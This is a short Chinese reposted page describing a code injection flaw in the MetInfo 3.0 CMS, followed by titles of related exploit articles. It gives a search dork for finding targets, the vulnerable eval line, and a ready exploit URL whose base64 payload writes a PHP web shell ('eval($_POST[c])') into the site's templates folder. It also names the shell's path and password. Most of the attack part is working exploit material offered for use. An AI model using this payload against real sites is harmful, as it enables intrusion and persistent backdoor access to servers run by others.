MetInfo 3.0 PHP代码注入漏洞(getshell)
2014-05-29 17:22
1381 查看
MetInfo 3.0 PHP代码注入漏洞(getshell)
来源:本站转载 作者:佚名 时间:2010-11-07 TAG: 我要投稿官网:http://www.metinfo.cn/
关键字:"Powered by MetInfo 3.0 "
来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
描述:
在文件/include/common.inc.php第67行:
eval(base64_decode($allclass[0]));
$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。
POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');
一句话后门地址:http://target.com/templates/test.php 密码:c
另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html
相关文章推荐
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
- Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法
- phpMyAdmin setup.php脚本PHP代码注入漏洞
- 比较好用的PHP防注入漏洞过滤函数代码
- 通用的PHP防注入漏洞攻击的过滤函数代码
- [代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器
- metinfo多个漏洞(可getshell)
- 阿里云提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法
- php taint检测XSS/SQL/Shell注入漏洞
- phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
- 比较好用的PHP防注入漏洞过滤函数代码
- php注入代码收集之一
- 渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
- php的curl实现get和post的代码
- 补上一篇 EXT Tree 中遗漏的get-node.php代码
- php反弹shell实现代码
- asp防注入代码 过滤 get post cookies